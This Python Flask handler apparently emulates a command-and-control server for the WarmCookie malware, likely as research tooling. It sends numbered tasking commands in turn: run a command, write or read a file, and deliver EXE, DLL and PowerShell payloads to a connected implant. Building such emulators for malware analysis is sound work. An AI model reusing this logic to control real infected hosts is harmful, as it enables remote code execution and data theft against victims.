def hello()

in tools/warmcookie/warmcookie_http.py [0:0]


def hello():

    global COMMAND_ID
    value1 = 0x1

    if request.method == "GET":

        if COMMAND_ID in [0x00000001, 0x00000002, 0x00000003, 0x0000000B]:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            response = Response(
                build_request(value1, COMMAND_ID, new_handler_multi_parameter()),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000004:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            response = Response(
                build_request(
                    value1, COMMAND_ID, bytes(new_handler_4_parameter(COMMAND))
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000005:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            response = Response(
                build_request(
                    value1,
                    COMMAND_ID,
                    bytes(new_handler_5_parameter(FILE_PATH, FILE_DATA)),
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000006:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            response = Response(
                build_request(
                    value1,
                    COMMAND_ID,
                    bytes(new_handler_6_parameter(FILE_PATH)),
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000007:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            with open(EXE_PATH, "rb") as exe_file:
                exe_data = exe_file.read()

            response = Response(
                build_request(
                    value1, COMMAND_ID, bytes(new_handler_7_parameter(exe_data))
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000008:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            with open(DLL_PATH, "rb") as dll_file:
                dll_data = dll_file.read()

            response = Response(
                build_request(
                    value1,
                    COMMAND_ID,
                    bytes(new_handler_8_parameter(DLL_EXPORT, dll_data)),
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x00000009:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            with open(PS1_PATH, "rb") as ps1_file:
                ps1_data = ps1_file.read()

            response = Response(
                build_request(
                    value1, COMMAND_ID, bytes(new_handler_9_parameter(ps1_data))
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        elif COMMAND_ID == 0x0000000A:
            print(f"Command Handler: {hex(COMMAND_ID)}")

            with open(DLL_PATH, "rb") as dll_file:
                dll_data = dll_file.read()

            response = Response(
                build_request(
                    value1, COMMAND_ID, bytes(new_handler_10_parameter(dll_data))
                ),
                mimetype="application/octet-stream",
            )

            COMMAND_ID += 1
            return response

        else:
            return Response("Command not supported", status=400)

    elif request.method == "POST":
        return Response("POST request received", status=200)